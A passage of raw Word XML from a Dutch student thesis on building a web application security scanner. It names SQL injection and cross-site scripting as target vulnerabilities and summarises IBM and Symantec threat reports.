      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004C504C">
        <w:t xml:space="preserve">De kern componenten van een </w:t>
      </w:r>
      <w:r w:rsidR="00E57576">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="004C504C">
        <w:t xml:space="preserve"> scanner bestaan dus uit een GUI of </w:t>
      </w:r>
      <w:r w:rsidR="00E81BA5">
        <w:t>CLI-interface</w:t>
      </w:r>
      <w:r w:rsidR="004C504C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C504C">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C504C">
        <w:t>/Spider, Tester/Scanner, Rapport generator.</w:t>
      </w:r>
      <w:r w:rsidR="00AF6315">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00352A9D">
        <w:t xml:space="preserve">Al deze componenten en processen zullen deel uitmaken van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00352A9D">
        <w:t>Proof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00352A9D">
        <w:t xml:space="preserve"> of Concept die i</w:t>
      </w:r>
      <w:r w:rsidR="004B16BA">
        <w:t>k in dit project zal ontwikkelen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575FA1ED" w14:textId="77777777" w:rsidR="004B16BA" w:rsidRDefault="004B16BA" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B61EE45" w14:textId="77777777" w:rsidR="004B16BA" w:rsidRDefault="004B16BA" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE04428" w14:textId="50D87734" w:rsidR="00333E54" w:rsidRDefault="00333E54" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006144BB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5CA4F" w14:textId="5423C09A" w:rsidR="00390E15" w:rsidRDefault="00E5134C" w:rsidP="00C41D9B">
      <w:r>
        <w:t>In het eerste deel van dit deel</w:t>
      </w:r>
      <w:r w:rsidR="006C4E4B">
        <w:t xml:space="preserve">onderzoek heb ik gekeken naar welke kwetsbaarheden zich voor kunnen doen op een </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="006C4E4B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004A10E6">
        <w:t xml:space="preserve"> Hierbij heb ik twee documenten bestudeerd, de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004A10E6">
        <w:t>OWASP top</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004A10E6">
        <w:t xml:space="preserve"> 10 lijst en de WASC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004A10E6">
        <w:t>Threat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004A10E6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004A10E6">
        <w:t>Classification</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004A10E6">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003E0E61">
        <w:t>Na het bestuderen en analyseren van de informatie ben</w:t>
      </w:r>
      <w:r w:rsidR="00E0269E">
        <w:t xml:space="preserve"> ik tot de conclusie gekomen om mij te richten op twee kwetsbaarheden die veelvoorkomende zijn en relatief makkelijk te detecteren zijn. </w:t>
      </w:r>
      <w:r w:rsidR="00407DEB">
        <w:t xml:space="preserve">Mijn selectie van kwetsbaarheden bevat de (A1/WACS-19) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00407DEB">
        <w:t>SQL injectie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00407DEB">
        <w:t xml:space="preserve"> en (A3/WASC-8) Cross-site scripting. Voor het bewijzen dat </w:t>
      </w:r>
      <w:r w:rsidR="00723CC2">
        <w:t xml:space="preserve">mijn </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00723CC2">
        <w:t>Proof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00723CC2">
        <w:t xml:space="preserve"> of Concept werkt behoren</w:t>
      </w:r>
      <w:r w:rsidR="003E0667">
        <w:t xml:space="preserve"> deze twee </w:t>
      </w:r>
      <w:r w:rsidR="00407DEB">
        <w:t>kwetsbaarheden</w:t>
      </w:r>
      <w:r w:rsidR="00723CC2">
        <w:t xml:space="preserve"> minimaal bij het testproces (Tabel 3.5</w:t>
      </w:r>
      <w:r w:rsidR="005D30A7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005D30A7">
        <w:t>Testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00723CC2">
        <w:t xml:space="preserve">) van de </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00723CC2">
        <w:t xml:space="preserve"> scanner. </w:t>
      </w:r>
      <w:r w:rsidR="003E0667">
        <w:t xml:space="preserve">Het zijn kwetsbaarheden die vaak door hackers geëxploiteerd worden en hoge schade kunnen richten aan een bedrijf die afhankelijk is van een </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="003E0667">
        <w:t>. Ook zijn deze twee kwetsbaarheden relatief mak</w:t>
      </w:r>
      <w:r w:rsidR="009777DC">
        <w:t xml:space="preserve">kelijk </w:t>
      </w:r>
      <w:r w:rsidR="0001353E">
        <w:t>te implementeren.</w:t>
      </w:r>
      <w:r w:rsidR="00525CC7">
        <w:t xml:space="preserve"> In het tweede deel van het deelonderzoek heb ik het WASC </w:t>
      </w:r>
      <w:r w:rsidR="003745BF" w:rsidRPr="00825BDD">
        <w:t>Web Application Security Scanner Evaluation</w:t>
      </w:r>
      <w:r w:rsidR="00C97F43">
        <w:t xml:space="preserve"> Criteria</w:t>
      </w:r>
      <w:r w:rsidR="003745BF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00525CC7">
        <w:t xml:space="preserve">document praktisch gebruikt om een </w:t>
      </w:r>
      <w:r w:rsidR="00897324">
        <w:t>algemeen</w:t>
      </w:r>
      <w:r w:rsidR="00525CC7">
        <w:t xml:space="preserve"> web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00525CC7">
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00525CC7">
        <w:t xml:space="preserve"> scanner te ontleden zodat ik </w:t>
      </w:r>
      <w:r w:rsidR="00897324">
        <w:t>een overzicht</w:t>
      </w:r>
      <w:r w:rsidR="00525CC7">
        <w:t xml:space="preserve"> kon maken van de componenten en processen waaruit het systeem in kwestie bestaat. </w:t>
      </w:r>
      <w:r w:rsidR="00367FB7">
        <w:t>Ik kan concluderen dat ik deze lijst (Tabel 3.5) za</w:t>
      </w:r>
      <w:r w:rsidR="001F07CE">
        <w:t xml:space="preserve">l gebruiken als referentie tijdens het maken van mijn </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F07CE">
        <w:t>requirement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F07CE">
        <w:t xml:space="preserve"> lijst</w:t>
      </w:r>
      <w:r w:rsidR="00E57B02">
        <w:t xml:space="preserve"> oftewel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E57B02">
        <w:t>MoSCoW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F07CE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DDCCBC" w14:textId="74002559" w:rsidR="006144BB" w:rsidRDefault="003E0667" w:rsidP="00C41D9B">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A938E" w14:textId="77777777" w:rsidR="00584909" w:rsidRPr="00F21A21" w:rsidRDefault="00584909" w:rsidP="00C41D9B"/>
    <w:p w14:paraId="3B2FA5D7" w14:textId="6D429F25" w:rsidR="00F75C28" w:rsidRDefault="009C5666" w:rsidP="00C41D9B">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00692848">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00491407">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09944269" w14:textId="77777777" w:rsidR="007755FD" w:rsidRPr="00825BDD" w:rsidRDefault="007755FD" w:rsidP="00C41D9B"/>
    <w:p w14:paraId="661494F9" w14:textId="4BAFA03B" w:rsidR="008F5958" w:rsidRPr="00825BDD" w:rsidRDefault="008F5958" w:rsidP="00C41D9B"/>
    <w:p w14:paraId="2BA2D34C" w14:textId="77777777" w:rsidR="0057621C" w:rsidRPr="00825BDD" w:rsidRDefault="0057621C" w:rsidP="00C41D9B"/>
    <w:p w14:paraId="19B86395" w14:textId="77777777" w:rsidR="005E11C0" w:rsidRPr="00825BDD" w:rsidRDefault="005E11C0" w:rsidP="00C41D9B"/>
    <w:p w14:paraId="09A1D107" w14:textId="43086EDA" w:rsidR="002479BA" w:rsidRPr="00825BDD" w:rsidRDefault="00114266" w:rsidP="00C41D9B">
      <w:r w:rsidRPr="00825BDD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E8504F" w14:textId="6F00DE90" w:rsidR="00000462" w:rsidRPr="002D5A97" w:rsidRDefault="00A849AF" w:rsidP="001B2483">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc491022063"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.3</w:t>
      </w:r>
      <w:r w:rsidR="000D4C6C">
        <w:t xml:space="preserve"> Rapporten Online Webshops</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidR="000D4C6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57785678" w14:textId="7EED9148" w:rsidR="00C663CC" w:rsidRDefault="00FB0528" w:rsidP="001A0FEC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc491022064"/>
      <w:r>
        <w:t xml:space="preserve">3.3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00734D1C">
        <w:t>Inleiding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="6F062A2A" w14:textId="71A8DDB7" w:rsidR="00671A9B" w:rsidRDefault="00DD50CA" w:rsidP="002F05FE">
      <w:r>
        <w:t xml:space="preserve">In dit deel zal ik </w:t>
      </w:r>
      <w:r w:rsidR="007C1171">
        <w:t>een aantal rapporten behandelen die schreven hebben over web s</w:t>
      </w:r>
      <w:r w:rsidR="0016642A">
        <w:t xml:space="preserve">ecurity in de voorgaande jaren. Het doel van dit deelhoofdstuk is om de lezer te informeren over de toestand waar de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0016642A">
        <w:t>web applicaties</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0016642A">
        <w:t xml:space="preserve"> in verkeren op gebied van web se</w:t>
      </w:r>
      <w:r w:rsidR="00920E13">
        <w:t>curity.</w:t>
      </w:r>
      <w:r w:rsidR="00F30D80">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004741BC">
        <w:t xml:space="preserve">Vragen als welke industrie is het meest gedupeerd? En </w:t>
      </w:r>
      <w:r w:rsidR="00D245F7">
        <w:t>welke risico’s lopen ondernemers bij het oprich</w:t>
      </w:r>
      <w:r w:rsidR="008F0408">
        <w:t xml:space="preserve">ten van een webshop met een CMS? </w:t>
      </w:r>
      <w:r w:rsidR="00920E13">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00625591">
        <w:t>Er zijn een aantal grote bedrijven die ie</w:t>
      </w:r>
      <w:r w:rsidR="00601446">
        <w:t xml:space="preserve">der jaar een rapport publiceren, deze bedrijven analyseren in het rapport de bedreigingen en risico’s waar de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00601446">
        <w:t>web applicaties</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00601446">
        <w:t xml:space="preserve"> voor open staan </w:t>
      </w:r>
      <w:r w:rsidR="0042034B">
        <w:t>en nemen een kijk naar interessante gebeurtenissen waarbij grote ondernemingen slachtoffer zijn geworden van cyber aanvallen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1741C259" w14:textId="26CA9852" w:rsidR="00E63DCE" w:rsidRDefault="00E63DCE" w:rsidP="002F05FE">
      <w:r>
        <w:t>De drie bedrijven zijn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C98348" w14:textId="77777777" w:rsidR="00DC69E4" w:rsidRDefault="00DC69E4" w:rsidP="00DC69E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>IBM Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBE4EC6" w14:textId="77777777" w:rsidR="00DC69E4" w:rsidRDefault="00E63DCE" w:rsidP="00DC69E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Symantec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123F174C" w14:textId="3F6101C0" w:rsidR="0064219A" w:rsidRDefault="000C5FFC" w:rsidP="00DC69E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sucuri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68E0F82A" w14:textId="783B685D" w:rsidR="00DC69E4" w:rsidRPr="00723BE8" w:rsidRDefault="001B2483" w:rsidP="001B2483">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc491022065"/>
      <w:r>
        <w:t>3.3</w:t>
      </w:r>
      <w:r w:rsidR="00375977">
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="00740679" w:rsidRPr="00723BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC69E4" w:rsidRPr="00723BE8">
        <w:t>IBM Security 2016</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="199D553A" w14:textId="44FEE857" w:rsidR="00864308" w:rsidRDefault="00DC69E4" w:rsidP="00DC69E4">
      <w:r>
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:r w:rsidR="004366DB">
        <w:t>securityafdeling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> van IBM heeft in 2016 de rapport X-Force </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Threat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Intelligence Report gepubliceerd waarin verschillende onderwerpen worden besproken op gebied van Cyber Security. Het rapport van 2017 is nog niet publiekelijk gepubliceerd. Er wordt </w:t>
      </w:r>
      <w:r w:rsidR="004366DB">
        <w:t>teruggekeken</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> naar het jaar 2015, een zeer actieve jaar voor cybercriminelen. Er wordt vermeld dat cybercriminelen het gemunt hebben op grotere doelwitten en dat zij niet meer zo zeer bezig zijn met het stelen van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>emails</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en wachtwoorden, hoewel dit nog zeker in grote schaal gebeurt, maar door de vraag naar waardevollere data doelwitten hebben als </w:t>
      </w:r>
      <w:r w:rsidR="004366DB">
        <w:t>patiëntgegevens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> van gezondheidsinstituten en andere overheidsinstanties. Een voorbeeld </w:t>
      </w:r>
      <w:r w:rsidR="004366DB">
        <w:t>hiervan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is een incident in de zorg sector waarbij hackers gevoelige data hebben gestolen van 55 zorgverzekeraars. Het gaat om de persoonlijke gegevens van 110 miljoen klanten [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Motherboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, 2015]. </w:t>
      </w:r>
      <w:r w:rsidR="007E72BA">
        <w:t xml:space="preserve">In een </w:t>
      </w:r>
      <w:r w:rsidR="004366DB">
        <w:t>ander</w:t>
      </w:r>
      <w:r w:rsidR="007E72BA">
        <w:t xml:space="preserve"> rapport van IBM genaamd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007E72BA" w:rsidRPr="007E72BA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007E72BA" w:rsidRPr="007E72BA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> of Data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007E72BA" w:rsidRPr="007E72BA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Breach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007E72BA" w:rsidRPr="007E72BA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007E72BA" w:rsidRPr="007E72BA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Study</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007E72BA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00761648">
        <w:t xml:space="preserve">wordt vermeld dat de </w:t>
      </w:r>
      <w:r w:rsidR="00645812">
        <w:t xml:space="preserve">totale kosten van de data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00645812">
        <w:t>breaches</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00645812">
        <w:t xml:space="preserve"> over 2015</w:t>
      </w:r>
      <w:r w:rsidR="00EF23C3">
        <w:t xml:space="preserve"> geschat wordt op </w:t>
      </w:r>
      <w:r w:rsidR="00942565">
        <w:t>$3.70 miljoen dollar</w:t>
      </w:r>
      <w:r w:rsidR="00A72BCC">
        <w:t xml:space="preserve">. In 2014 stond de teller op $3,52 miljoen </w:t>
      </w:r>
      <w:r w:rsidR="005E0C03">
        <w:t>dit betekent dat er een stijging was</w:t>
      </w:r>
      <w:r w:rsidR="00CA34A8">
        <w:t xml:space="preserve"> van 7</w:t>
      </w:r>
      <w:r w:rsidR="004366DB">
        <w:t>%.</w:t>
      </w:r>
      <w:r w:rsidR="005C46C5">
        <w:t xml:space="preserve"> Er wordt verwacht dat er in de jaren die erop volgen de kosten alleen maar zullen toenemen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF7249A" w14:textId="77777777" w:rsidR="009914EA" w:rsidRDefault="007D3F8B" w:rsidP="009914EA">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FC1A519" wp14:editId="0E274886">
            <wp:extent cx="5836285" cy="2936240"/>
            <wp:effectExtent l="0" t="0" r="5715" b="10160"/>
            <wp:docPr id="25" name="Grafiek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72885FF" w14:textId="5E0E1F8F" w:rsidR="00CC33B8" w:rsidRPr="002165AD" w:rsidRDefault="008B2EEC" w:rsidP="009914EA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002165AD">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Grafiek 3.2</w:t>
      </w:r>
      <w:r w:rsidR="009914EA" w:rsidRPr="002165AD">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="0044093C" w:rsidRPr="002165AD">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> – meest gedupeerde industrieën</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9D2B4C" w14:textId="13622509" w:rsidR="00DC69E4" w:rsidRDefault="00DC69E4" w:rsidP="00DC69E4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidR="00AB0B34">
        <w:t>Grafiek 3.4.1</w:t>
      </w:r>
      <w:r w:rsidR="004366DB">
        <w:t xml:space="preserve"> wordt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> er geïllustreerd welke industrieën het meest gedupeerd worden door aanvallen en wat de meeste voorkomende aanval types </w:t>
      </w:r>
      <w:r w:rsidR="004366DB">
        <w:t>waren in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2015. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B92D661" w14:textId="1048F94F" w:rsidR="00864308" w:rsidRDefault="00DC69E4" w:rsidP="00DC69E4">
      <w:r>
        <w:t xml:space="preserve">Voor mij zijn de cijfers over </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SQL injecties</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en misconfiguraties het meest interessant want deze twee komen voor in het OWASP top 10 lijst die ik in dit document uitgebreid behandel en die veel invloed heeft op het ontwerpen van mijn security web scanner. Ook interessant is dat verre weg de meest aangevallen industrie de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>computer service</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is, met 30.2%. Onder deze industrie valt natuurlijk website en webservers en dit onderstreept weer eens dat web security scanners zeker een belangrijke rol hebben in het veilig maken van de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>wereld wijde</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6A0905" w14:textId="4B92114C" w:rsidR="002F05FE" w:rsidRPr="0021123C" w:rsidRDefault="00332BA1" w:rsidP="00332BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc491022066"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>3.3</w:t>
      </w:r>
      <w:r w:rsidR="00375977">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidR="00740679" w:rsidRPr="00723BE8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00233BD8" w:rsidRPr="00723BE8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Symantec rapport 2017</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="67E9016C" w14:textId="6DB4A8EC" w:rsidR="00233BD8" w:rsidRDefault="00546E25" w:rsidP="002F05FE">
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>april</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2017 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>bracht</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Sym</w:t>
      </w:r>
      <w:r w:rsidR="00D27123" w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>antic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D27123" w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Internet Security Threat Re</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>uit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D27123" w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0055494B" w:rsidRPr="0055494B">
        <w:t>Symantic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0055494B" w:rsidRPr="0055494B">
        <w:t xml:space="preserve"> behandelt een variatie van onderwerpen in de kader Internet Security</w:t>
      </w:r>
      <w:r w:rsidR="0055494B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00333EF0">
        <w:t xml:space="preserve">Onderwerpen als </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00333EF0">
        <w:t>Ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00333EF0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00333EF0">
        <w:t>phishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00333EF0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00112D85">
        <w:t>IoT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00112D85">
        <w:t xml:space="preserve"> en nog veel meer. </w:t>
      </w:r>
      <w:r w:rsidR="005D12DE">
